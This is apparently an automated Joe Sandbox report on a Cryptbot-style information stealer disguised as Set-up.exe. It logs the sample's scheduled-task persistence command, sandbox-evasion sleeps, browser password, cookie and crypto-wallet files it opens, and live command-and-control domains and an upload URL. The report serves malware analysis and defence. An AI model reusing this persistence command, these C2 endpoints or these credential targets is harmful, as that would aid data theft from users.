Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hxocobpybsjxncpovlwz.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hxocobpybsjxncpovlwz.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 9979392 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_006F8230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006FA499 push es; iretd	4_2_006FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C370C30 push eax; mov dword ptr [esp], edi	4_2_6C370DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33ED10 push eax; mov dword ptr [esp], ebx	4_2_6C33EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C314E31 push eax; mov dword ptr [esp], ebx	4_2_6C314E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C308E7A push edx; mov dword ptr [esp], ebx	4_2_6C308E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30A947 push eax; mov dword ptr [esp], ebx	4_2_6C30A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33EAB0 push eax; mov dword ptr [esp], ebx	4_2_6C33EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C328AA0 push eax; mov dword ptr [esp], ebx	4_2_6C32909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C310AA2 push eax; mov dword ptr [esp], ebx	4_2_6C310AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C312AAC push edx; mov dword ptr [esp], ebx	4_2_6C312AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C342BF0 push eax; mov dword ptr [esp], ebx	4_2_6C342F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C342BF0 push edx; mov dword ptr [esp], ebx	4_2_6C342F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C308435 push edx; mov dword ptr [esp], ebx	4_2_6C308449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C328460 push eax; mov dword ptr [esp], ebx	4_2_6C328A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30048B push eax; mov dword ptr [esp], ebx	4_2_6C3004A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3004E0 push eax; mov dword ptr [esp], ebx	4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx	4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx	4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30A5A7 push eax; mov dword ptr [esp], ebx	4_2_6C30A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C342620 push eax; mov dword ptr [esp], ebx	4_2_6C342954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C342620 push edx; mov dword ptr [esp], ebx	4_2_6C342973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3506B0 push eax; mov dword ptr [esp], ebx	4_2_6C350A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3186A1 push 890005EAh; ret	4_2_6C3186A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3006A2 push eax; mov dword ptr [esp], ebx	4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3006A6 push eax; mov dword ptr [esp], ebx	4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3066F3 push edx; mov dword ptr [esp], ebx	4_2_6C306707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3006FD push eax; mov dword ptr [esp], ebx	4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30070E push eax; mov dword ptr [esp], ebx	4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30A777 push eax; mov dword ptr [esp], ebx	4_2_6C30A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C310042 push eax; mov dword ptr [esp], ebx	4_2_6C310056
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2DE0D0 push eax; mov dword ptr [esp], ebx	4_2_6C396AF6

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\HXocObpYbsjxnCpoVLwZ.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-158336

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-158337

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 980

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 6412	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128	Thread sleep count: 980 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128	Thread sleep time: -98000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe	Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}R0}R
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}V0}V
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2324509023.000000000144F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838220618.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.0000000001455000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000002.2324509023.00000000013FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_006F8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	4_2_006F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_006F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_006F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	4_2_006F13C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C3484D0 cpuid

4_2_6C3484D0

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 4.2.service123.exe.6c2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2307441720.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 332, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: Electrum BTCP
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: nRAnkamaLGHUBH:I:BitBox WalletTrezor WalletTelegramTelegram ()atomic\Local Storage\leveldb\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Desktop\Profiles\\User Data\\Opera Software\no errorundefined errortoo many filesfile too largeunsupported methodunsupported encryptionunsupported featurefailed finding central directorynot a ZIP archiveinvalid header or archive is corruptedunsupported multidisk archivedecompression failed or archive is corruptedcompression failedunexpected decompressed sizeCRC-32 check failedunsupported central directory sizeallocation failedfile open failedfile create failedfile write failedfile read failedfile close failedfile seek failedfile stat failedinvalid parameterinvalid filenamebuffer too smallinternal errorfile not foundarchive is too largevalidation failedwrite callback failedtotal errors
Source: Set-up.exe	String found in binary or memory: Jaxx Liberty
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: Exodus Eden
Source: Set-up.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elevenvh11pt.top	185.244.181.140	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
@elevenvh11pt.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
11pt.top	true		unknown
elevenvh11pt.top	true		unknown
+elevenvh11pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	HXocObpYbsjxnCpoVLwZ.dll.0.dr	false		unknown
http://elevenvh11pt.top/v1/upload.phpP	Set-up.exe, 00000000.00000003.2309002492.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://elevenvh11pt.top/v1/upload.php	Set-up.exe, 00000000.00000003.1838220618.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.000000000143C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	Set-up.exe	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.181.140	elevenvh11pt.top	Russian Federation		44901	BELCLOUDBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521577
Start date and time:	2024-09-29 00:44:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7100 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
18:45:17	API Interceptor	3x Sleep call for process: Set-up.exe modified
18:46:40	API Interceptor	680x Sleep call for process: service123.exe modified
23:46:07	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.181.140	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12ht.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13sr.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivevh5vs.top/v1/upload.php
